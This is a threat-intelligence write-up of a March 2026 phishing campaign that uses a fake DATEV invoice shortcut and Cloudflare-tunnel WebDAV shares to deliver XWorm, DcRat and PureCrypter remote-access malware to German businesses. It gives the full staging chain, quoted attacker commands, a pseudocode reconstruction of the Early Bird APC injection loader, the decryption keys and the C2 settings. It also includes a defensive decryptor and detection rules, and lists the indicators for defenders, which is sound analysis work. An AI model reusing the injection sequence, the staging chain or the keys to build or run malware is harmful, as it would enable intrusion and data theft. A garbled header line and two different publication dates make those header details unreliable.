Severity: high | Category: Phishing
Investigated: March 6, 2026 | Published: March 6, 2026

SERPENTINE#CLOUD: Dissecting a Multi-RAT Cloudflare Tunnel Campaign Targeting German Businesses

Threat Actors:s-abuse-cloudflare-tunnels-threat-research/)
Tags: #phishing #asyncrat #xworm #venomrat #social-engineering #credential-theft #c2 #apt #spearphishing

Published: 2026-03-08 | TLP:WHITE | breakglass.intelligence


TL;DR

An active SERPENTINE#CLOUD campaign is delivering five RAT payloads (2x XWorm, 1x DcRat, 2x PureCrypter) to German-speaking targets through dual Cloudflare tunnels serving WsgiDAV WebDAV shares. The attack chain uses a fake DATEV invoice LNK lure, cross-tunnel redirection, a downloaded Python 3.14 runtime for in-memory decryption, Donut shellcode with Chaskey CTR encryption, and Early Bird APC injection into explorer.exe -- achieving near-fileless execution across all five payloads simultaneously.


Attack Chain Overview

The kill chain spans 10 stages from initial lure to final payload execution:

Phishing link
  └─> Cloudflare Tunnel 1 (WebDAV share spoofed as Windows Downloads folder)
       └─> Victim clicks "DATEV-Rechnung Nr. 69928142421.pdf.lnk"
            └─> wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh
                 └─> Cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
                      └─> dat.wsf copies dat.bat to %APPDATA%, executes hidden
                           └─> dat.bat:
                               ├── Opens legitimate ZUGFeRD decoy PDF
                               ├── Downloads Python 3.14.0rc3 from python.org
                               ├── Downloads pun.py + 5 encrypted payload pairs
                               ├── Creates startup persistence (start.bat)
                               └── Executes: python pun.py -i <payload>.bin -k <key>.txt (x5)
                                    └─> Double XOR decrypt → Early Bird APC injection → explorer.exe
                                         └─> Donut shellcode: Chaskey CTR → AMSI/WLDP bypass → .NET CLR
                                              └─> XWorm, DcRat, PureCrypter execute in memory

After initial execution, the chain is completely fileless. Nothing touches disk except the embedded Python runtime downloaded from the legitimate python.org domain.


Infrastructure: Dual Cloudflare Tunnels

The campaign uses two trycloudflare.com tunnels, both running WsgiDAV/4.3.3 with anonymous read-write access.

Tunnel 1 -- Lure Delivery

Domain: shortly-flux-corresponding-junction.trycloudflare[.]com

File                                               | Size    | Purpose
---------------------------------------------------|---------|--------------------------------------
/Dokumente/DATEV-Rechnung Nr. 69928142421.pdf.lnk  | 1,371 B | LNK lure (Edge icon, spoofed as PDF)
/dat.wsh                                           | 135 B   | WSH redirect to Tunnel 2
/desktop.ini                                       | 504 B   | Spoofs folder as Windows Downloads

The desktop.ini is a nice touch -- it changes the WebDAV share's appearance to look like the Windows Downloads folder when opened in File Explorer, reducing victim suspicion.

Tunnel 2 -- Payload Staging

Domain: licensing-hypothesis-byte-thomas.trycloudflare[.]com

File                   | Size      | Purpose
-----------------------|-----------|-----------------------------------------
/dat.wsf               | 918 B     | VBScript loader
/dat.bat               | 2,205 B   | Main stager (decoy + Python + payloads)
/ent/pun.py            | 3,092 B   | APC injection loader
/ent/rp.bin + rp.txt   | 786,690 B | PureCrypter (Xwann.exe)
/ent/sw.bin + sw.txt   | 417,026 B | PureCrypter (Iqovaeay.exe)
/ent/xwb.bin + xwb.txt | 71,938 B  | XWorm
/ent/wx.bin + wx.txt   | 71,938 B  | XWorm variant
/ent/ap.bin + ap.txt   | 103,170 B | DcRat

Each payload is delivered as a .bin/.txt pair -- the .bin contains the encrypted shellcode and the .txt holds two 8-byte hex XOR keys. Splitting the key material from the ciphertext is a trivial but effective AV evasion technique.


The Lure: DATEV Invoice Social Engineering

The LNK file targets German businesses by impersonating a DATEV invoice. DATEV is the dominant tax and accounting software provider in Germany, used by the vast majority of tax advisors and a large portion of SMBs -- making it an extremely high-value lure for this geography.

The LNK uses %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe as its icon source, causing it to display with a browser/document icon rather than the shortcut arrow. Combined with the .pdf.lnk double extension, most victims would see what appears to be a standard PDF.

When executed, dat.bat opens a legitimate ZUGFeRD invoice PDF from invoice-portal[.]de as a decoy -- the victim sees a real invoice document while the malware executes in the background.


Encryption: Three Layers Deep

Layer 1 -- Double XOR (pun.py)

Each payload pair uses two 8-byte hex keys for repeating XOR decryption:

# Decryption logic from pun.py: repeating-key XOR applied twice (key2 first, then key1)
xor = lambda data, key: bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
plaintext = xor(xor(ciphertext, key2), key1)   # key1, key2: the two 8-byte keys from <name>.txt

Key material per payload:

Payload | Family      | Key 1            | Key 2
--------|-------------|------------------|-----------------
rp      | PureCrypter | f368471bcb862de6 | c2590c0d1d103109
sw      | PureCrypter | d9dcad63d4741260 | 1b08df34ddd6415c
xwb     | XWorm       | 7b5724134a5b533f | 03e55c21392f560f
wx      | XWorm       | f282362d2c7be0af | 6189b12ea8ca5b98
ap      | DcRat       | 0a3313fc809c66d6 | c180a1be31e517bb

This is a Generation 1 encryption variant in the SERPENTINE#CLOUD taxonomy. The campaign has evolved through multiple encryption generations, but continues to redeploy earlier variants alongside newer ones.
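The Generation 1 layer as a stand-alone analyst decryptor, added here as an example (this is not pun.py's code). It assumes the .txt key file holds the two hex keys whitespace-separated (the post does not state the layout) and wraps rp's published keys around a constructed dummy blob; it also shows that two equal-length repeating XOR keys collapse to a single 8-byte key (key1 XOR key2), so the second pass adds no strength over one.

```python
import hashlib

def parse_key_file(text):
    """Parse a <name>.txt: two 16-hex-char (8-byte) keys, whitespace-separated (assumed layout)."""
    keys = [bytes.fromhex(tok) for tok in text.split()]
    if len(keys) != 2 or any(len(k) != 8 for k in keys):
        raise ValueError("expected exactly two 8-byte hex keys")
    return keys

def xor_repeat(data, key):
    """Repeating-key XOR, the primitive pun.py applies twice."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decrypt_payload(ciphertext, key1, key2):
    """pun.py order from the post: XOR with key2 first, then key1."""
    return xor_repeat(xor_repeat(ciphertext, key2), key1)

def effective_key(key1, key2):
    """Both keys are 8 bytes and start at offset 0, so the two passes equal one pass with key1 ^ key2."""
    return bytes(a ^ b for a, b in zip(key1, key2))

# Constructed sample, not a real payload: rp's published keys around a placeholder blob.
SAMPLE_KEY_FILE = "f368471bcb862de6\nc2590c0d1d103109\n"
SAMPLE_PLAIN = b"DONUT-STUB-PLACEHOLDER-" * 4

def roundtrip(plain=SAMPLE_PLAIN, key_text=SAMPLE_KEY_FILE):
    """Build a ciphertext the way the stager side would, decrypt it both ways, return its SHA256."""
    k1, k2 = parse_key_file(key_text)
    ct = xor_repeat(xor_repeat(plain, k1), k2)
    if decrypt_payload(ct, k1, k2) != plain:
        raise AssertionError("double-XOR decrypt failed")
    if xor_repeat(ct, effective_key(k1, k2)) != plain:
        raise AssertionError("collapsed single-key decrypt failed")
    return hashlib.sha256(plain).hexdigest()  # hash the recovered shellcode for IoC matching
```

On a real pair, hash the output of decrypt_payload and compare against the "Decrypted Donut Shellcode" list below; the single collapsed key is also what a known-plaintext check against the shared 23,925-byte Donut stub would recover.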

Layer 2 -- Donut Shellcode (v0.9.2/v0.9.3)

All five decrypted payloads are Donut shellcode loaders, each containing an identical 23,925-byte Donut stub. The Donut instances use:

  • Cipher: Chaskey block cipher in CTR mode (128-bit blocks, 16 rounds)
  • Encryption boundary: Instance data from offset 0x230 onward
  • Key storage: 16-byte master key at instance+0x04, 16-byte counter at instance+0x14

Embedded in each Donut loader are the following runtime bypasses:

  • AmsiInitialize / AmsiScanBuffer / AmsiScanString -- AMSI bypass
  • WldpQueryDynamicCodeTrust / WldpIsClassInApprovedList -- WLDP bypass

These ensure the .NET assemblies loaded via Donut's CLR bootstrapping are not scanned by Defender's in-process hooks.

Layer 3 -- C2 Configuration Encryption

The final .NET payloads use their own encryption for C2 configuration storage:

  • XWorm: AES-256-ECB with a non-standard key derivation -- MD5(key) expanded via overlapping Array.Copy into a 32-byte buffer
  • DcRat: PBKDF2 with AES-256-CBC, salt=DcRatByqwqdanchun (ASCII), 50,000 iterations, HMAC-SHA256 authentication

Injection Technique: Early Bird APC

pun.py implements Early Bird APC injection targeting explorer.exe. This technique queues the shellcode as an Asynchronous Procedure Call before the process's main thread begins execution:

# Reconstructed injection flow from pun.py (pseudocode; Win32 API names, constant values in comments)
hProcess, hThread = CreateProcessA("explorer.exe",
                                   dwCreationFlags=CREATE_SUSPENDED)      # 0x4
lpAddr = VirtualAllocEx(hProcess,
                        dwSize=len(decrypted_shellcode),
                        flAllocationType=MEM_COMMIT | MEM_RESERVE,     # 0x3000
                        flProtect=PAGE_READWRITE)                      # 0x04
WriteProcessMemory(hProcess, lpAddr, decrypted_shellcode)
VirtualProtectEx(hProcess, lpAddr, len(decrypted_shellcode),
                 flNewProtect=PAGE_EXECUTE_READ)                       # 0x20
QueueUserAPC(pfnAPC=lpAddr, hThread=hThread)   # APC fires as soon as the suspended thread resumes
ResumeThread(hThread)

This sequence runs five times -- once per payload -- spawning five suspended explorer.exe processes, each hosting a different RAT. The PAGE_READWRITE -> PAGE_EXECUTE_READ transition via VirtualProtectEx avoids allocating RWX memory, which is a common detection signal.
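Detection logic for the chain above, added as an example (not from the post or any vendor product). It runs over constructed process-creation events in Sysmon Event ID 1 field style; the host name tunnel1.trycloudflare.com and the user path are placeholders. Three signals are checked: Windows Script Host launched against a WebDAV UNC path, a Python interpreter under AppData running the -i/-k payload-pair loader, and explorer.exe created by a parent that never starts the shell.

```python
import re

# Constructed sample events (not real telemetry), Sysmon Event ID 1 field names.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe //B \\tunnel1.trycloudflare.com\DavWWWRoot\dat.wsh"},
    {"Image": r"C:\Users\u\AppData\Roaming\py\python.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python pun.py -i xwb.bin -k xwb.txt"},
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Users\u\AppData\Roaming\py\python.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},  # benign: normal shell start at logon
]

WSH_HOSTS = ("wscript.exe", "cscript.exe")
WEBDAV_UNC = re.compile(r"\\\\[^\\]+\\DavWWWRoot\\", re.I)         # \\host\DavWWWRoot\... (WebDAV redirector)
PAYLOAD_ARGS = re.compile(r"-i\s+\S+\.bin\s+-k\s+\S+\.txt", re.I)   # python pun.py -i X.bin -k X.txt
EXPLORER_PARENTS = ("userinit.exe", "winlogon.exe", "explorer.exe")  # parents a genuine shell start has

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the rule names one event trips; an empty list means nothing matched."""
    img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    # Stages 4-5: WSH run against a WebDAV UNC path; a trycloudflare host is a second, independent flag
    if img in WSH_HOSTS and WEBDAV_UNC.search(cmd):
        hits.append("wsh_from_webdav_unc")
    if img in WSH_HOSTS and "trycloudflare.com" in cmd.lower():
        hits.append("wsh_trycloudflare_host")
    # Stage 9: downloaded interpreter under AppData running the payload-pair loader
    if img == "python.exe" and "\\appdata\\" in ev["Image"].lower() and PAYLOAD_ARGS.search(cmd):
        hits.append("appdata_python_payload_loader")
    # Stages 9-10: explorer.exe created (suspended, then APC-injected) by an unexpected parent;
    # Early Bird APC uses no CreateRemoteThread, so the parent-child relation is the reliable signal
    if img == "explorer.exe" and parent not in EXPLORER_PARENTS:
        hits.append("explorer_unexpected_parent")
    return hits

def triage(events):
    """Map event index -> tripped rules, for every event that tripped at least one."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result
```

Five explorer.exe creations from the same AppData python.exe within seconds, as this campaign produces, would trip the last rule five times and is worth its own threshold alert.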


Final Payloads

XWorm V6.4 (xwb, wx)

Both XWorm instances are VB.NET assemblies running V6.4 by celestialproject.org -- a redistributed version of the XWorm MaaS lineage (XCoder v2-v5.6 -> XCoderTools V6.0 at $500/lifetime -> celestialproject.org V6.4, now offline).

Capabilities include: remote shell, DDoS (StartDDos/StopDDos), offline and live keylogging, plugin system, webcam capture via avicap32.dll, hosts file manipulation, USB spread, UAC bypass, screenshot capture, credential theft, process injection (injRun), and file download/execution.

DcRat (ap)

The DcRat instance carries the DcRatByqwqdanchun signature and includes: plugin architecture with MessagePack serialization, anti-VM detection (VMware, VirtualBox, Sandboxie), anti-process kill list (Taskmgr, ProcessHacker, procexp, MSASCui), runtime AMSI bypass via amsi.dll patching, ETW bypass via EtwEventWrite patching, NtProtectVirtualMemory for memory protection manipulation, SSL/TLS C2 with certificate pinning, and Pastebin integration for backup C2 resolution.

PureCrypter (rp, sw)

Both PureCrypter instances are .NET resource loaders that carry additional encrypted inner payloads. These act as secondary droppers, likely delivering additional malware families not captured in this analysis snapshot.


C2 Infrastructure

C2 Server       | RAT(s)             | Port(s)    | Hosting                              | RDP Hostname
----------------|--------------------|------------|--------------------------------------|---------------------
178.16.55[.]160 | XWorm (xwb)        | 2323       | Omegatech LTD, AS202412 (Seychelles) | DESKTOP-BUL6K1U
43.157.1[.]71   | XWorm (wx) + DcRat | 2323, 3232 | Tencent Cloud, AS132203 (Frankfurt)  | 172_28_0_12 (Docker)

Key findings from C2 reconnaissance:

  • 178.16.55[.]160 sits on Seychelles-registered bulletproof hosting. The same /24 subnet hosts other known RAT C2s (VenomRAT observed on .129). Windows VPS with IIS 10.0 default, RDP and SMB exposed.
  • 43.157.1[.]71 runs on Tencent Cloud Frankfurt, hosting both XWorm (port 2323) and DcRat (port 3232) inside a Docker container (hostname 172_28_0_12). This co-location confirms a single operator managing both RAT families.
  • Both servers expose RDP (3389/tcp) and SMB (445/tcp), though Guest/null sessions are disabled.
  • Infrastructure was provisioned in phases: 178.16.55[.]160 set up on 2026-01-19, 43.157.1[.]71 set up on 2026-02-15.

Decrypted C2 Configurations

XWorm (xwb):

Host:           178.16.55[.]160
Port:           2323
Version:        XWorm V6.4 by celestialproject.org
AES Key:        hP1RGR7hiCmurHiy
Encryption Key: <666666>
Separator:      <XWormmm>
Mutex:          USB.exe

XWorm (wx):

Host:           43.157.1[.]71
Port:           2323
AES Key:        H9r27PXZ8Hi3vMDL
Encryption Key: <666666>
Separator:      <XWormmm>
Mutex:          USB.exe

DcRat (ap):

Host:           127.0.0.1, 43.157.1[.]71
Port:           3232
Master Key:     A82RoLB2PKbWEikHJ55bENolnscLDEsc
Group:          Default
Certificate:    CN=DcRat, Issuer CN=EBOLA, O=DcRat By qwqdanchun
Cert Location:  CN/SH (Shanghai)
Cert Created:   2025-05-06
AMSI Target:    amsi.dll (base64: YW1zaS5kbGw=)
Pastebin C2:    null

The DcRat certificate issuer CN=EBOLA with Shanghai locality is consistent with the qwqdanchun DcRat builder defaults and does not necessarily indicate Chinese attribution for the campaign operator.


Operator OPSEC Failure

The LNK file retained builder machine metadata:

Field        | Value
-------------|-----------------------------------------------
Machine name | vincent-pc
SID          | S-1-5-21-4189620101-4119968542-7375749001-500
Account type | Built-in Administrator (RID 500)

Running as the built-in Administrator account (not a renamed admin) and leaving machine metadata in the LNK is a significant OPSEC failure. The SID's domain portion (4189620101-4119968542-7375749001) is a fingerprint for this specific builder installation and can be used for cross-campaign correlation.


Persistence

Three persistence mechanisms ensure survivability across reboots:

  1. Startup folder BAT (T1547.001): %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat -- re-executes all five payloads via the downloaded Python runtime, uses powershell -WindowStyle Hidden for self-concealment
  2. Registry Run key (T1547.001): DcRat writes to SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
  3. Scheduled task (T1053.005): DcRat creates a logon task with highest privileges via schtasks /create /f /sc onlogon /rl highest

Operational Timeline

WebDAV file metadata reveals the campaign's build and deployment cadence:

Date                    | Activity
------------------------|------------------------------------------------------------------------
2023-06-22              | desktop.ini created -- template reuse from a prior campaign wave
2025-08-05              | pun.py last modified (APC injection loader)
2025-12-13              | PureCrypter payload pair (rp.bin/rp.txt) built
2025-12-15              | Tunnel 2 /ent/ directory staged with pun.py and initial payloads
2026-01-16              | dat.wsf created on Tunnel 2
2026-01-19              | C2 server 178.16.55[.]160 provisioned (IIS default page timestamp)
2026-01-25--26          | sw.bin, xwb.bin (PureCrypter + XWorm) uploaded
2026-02-15              | C2 server 43.157.1[.]71 provisioned
2026-02-15--16          | ap.bin, wx.bin (DcRat + XWorm variant) uploaded; Tunnel 1 root created
2026-03-02              | dat.wsh created on Tunnel 1 (cross-tunnel redirect link)
2026-03-04 01:38--01:43 | dat.wsh modified, LNK lure placed in /Dokumente/
2026-03-04 10:58--11:01 | dat.bat and dat.wsf modified (active tuning)
2026-03-04 16:30        | /Dokumente/ last modified

Infrastructure was built over ~3 months (Dec 2025 -- Mar 2026), with the operator actively managing and modifying stager scripts on the day of analysis. Both tunnels were confirmed live and serving malware as of 2026-03-04 18:56 UTC.


MITRE ATT&CK Mapping

Technique                                    | ID        | Implementation
---------------------------------------------|-----------|-------------------------------------
Phishing: Spearphishing Link                 | T1566.002 | Email with link to WebDAV share
User Execution: Malicious File               | T1204.002 | LNK disguised as DATEV PDF
Command and Scripting: VBScript              | T1059.005 | dat.wsh / dat.wsf WSH chain
Command and Scripting: Windows Command Shell | T1059.003 | dat.bat stager
Command and Scripting: Python                | T1059.006 | pun.py shellcode injector
Process Injection: APC Injection             | T1055.004 | Early Bird APC into explorer.exe
Signed Binary Proxy Execution                | T1218.005 | wscript.exe proxy
Boot/Logon Autostart: Startup Folder         | T1547.001 | start.bat in Startup
Boot/Logon Autostart: Registry Run Keys      | T1547.001 | DcRat registry persistence
Scheduled Task/Job                           | T1053.005 | DcRat schtasks persistence
Obfuscated Files: Encrypted Payload          | T1027.013 | Multi-layer XOR + Chaskey CTR + AES
Subvert Trust Controls: Disable/Modify Tools | T1562.001 | Runtime AMSI/ETW/WLDP patching
Proxy: External Proxy                        | T1090.002 | Cloudflare tunnel for staging
Web Service: Dead Drop Resolver              | T1102.001 | DcRat Pastebin backup C2
Masquerading: Match Legitimate Name          | T1036.005 | DATEV invoice filename
Virtualization/Sandbox Evasion               | T1497     | DcRat anti-VM checks

Indicators of Compromise

Network Indicators

# Cloudflare Tunnels (WebDAV staging)
shortly-flux-corresponding-junction.trycloudflare[.]com
licensing-hypothesis-byte-thomas.trycloudflare[.]com

# C2 Servers
178.16.55[.]160:2323    # XWorm (xwb) - Omegatech LTD / Seychelles
43.157.1[.]71:2323      # XWorm (wx)  - Tencent Cloud / Frankfurt
43.157.1[.]71:3232      # DcRat (ap)  - Tencent Cloud / Frankfurt

# Legitimate (decoy, not malicious)
invoice-portal[.]de     # ZUGFeRD decoy PDF host
python.org/ftp/python/3.14.0/python-3.14.0rc3-embed-amd64.zip  # Python runtime

File Hashes -- Final .NET Payloads (SHA256)

# PureCrypter
6afbdd737bf86294c83d722f4470fe94fff8ed1c52b3739bcd3cffd3b97a3471  rp_pe (Xwann.exe)
a537078adf6734680d37af56b815aad682d684d77020d3aeb147f119546bb85a  sw_pe (Iqovaeay.exe)

# XWorm V6.4
328e3f46caf5e63c9784e9bf05e066dab3c44eb84274b2496a1bb6b0bd09bad0  xwb_pe
4df1eb2cefeffcf0d922d1e0304893cf13ed4cb03678f75be5f7275cb75e720d  wx_pe

# DcRat (qwqdanchun)
b690b7b7c455c50170a29c812d2ebbae89a539bc63033445cb5c2d8255d13ffe  ap_pe

File Hashes -- Decrypted Donut Shellcode (SHA256)

6ddcded14fefaf2ed1480c69bd41a131e6467bde48a6abb2b0dad34efbfe8db6  rp
b7cc6e1d870746b8903dfbf777f11b6192d2889065a542624087bd1f350458b0  sw
58f6f2b53da80c073a75772f1783dbc5b90777203bc4d613aec4956136874b4f  xwb
c2cea1caabb154dfcfe592f2d7b4ca5eeb0814c326c0b36cb2a6c2ff912acf51  wx
938f864252c133013937b7215dd8cd867b61c2df9a02b89b88e6ee9c70e63d8f  ap

File Hashes -- Encrypted Payloads (SHA256)

4a40ee942e1e84d7dbc8211fed9129c7355f32e5fcdef26c6e8aa9f82f400f7e  rp.bin
17f9dc72a12bf4df6110f746996268ee31d60603ea80e630b025d085d3ecee4d  sw.bin
66adbb9ab7d9cbbfcd46d9de226e8c6ce5fa5edf419882f714541c2a534acbb9  xwb.bin
d413060d381d9eaf52ec0f34402f35fc4116c4ca2fd715589f79c1c275058164  wx.bin
f65d9f6c995b5e8dee81ca3e4a774f5edf027d236da1a2bfefa76382abf913d3  ap.bin

File Hashes -- XOR Key Files (SHA256)

3e45f556d39df5c6d6d302b3425b021085b3178f1db75a376e0751f129c97654  rp.txt
dac104bf9bccf56cb0fc2fe05c8b516c64bee750b2629bf967903d0da5480a6a  sw.txt
9f46e66782e5d3056ab5e75c26d50b0a33efd9debb007fc2ddf23cf15315ea91  xwb.txt
72b94316fc457d1ecb9eccdcafb36caf37b20ad51f3cd9a3b4d01a9e0c2b19fc  wx.txt
c8da433c3a995e210ea22c49856a65be7a7b8f4b4021008fb5fa685e9ff4d139  ap.txt

Builder Artifacts

Machine:  vincent-pc
SID:      S-1-5-21-4189620101-4119968542-7375749001-500
Account:  Built-in Administrator (RID 500)

Attribution

This campaign is part of the SERPENTINE#CLOUD cluster tracked by Securonix, active since October 2024. Matching indicators include the identical delivery chain (Cloudflare tunnel -> WebDAV -> LNK -> WSH -> WSF -> BAT -> Python -> Donut), the same Python loader pattern with Early Bird APC injection, the same double-XOR encryption with 8-byte hex keys, identical Donut versions (v0.9.2/v0.9.3), consistent DATEV invoice targeting, and the same RAT families (XWorm, DcRat, with prior waves also deploying AsyncRAT, VenomRAT, and Remcos).

This represents a Generation 1 encryption variant in the March 2026 wave.

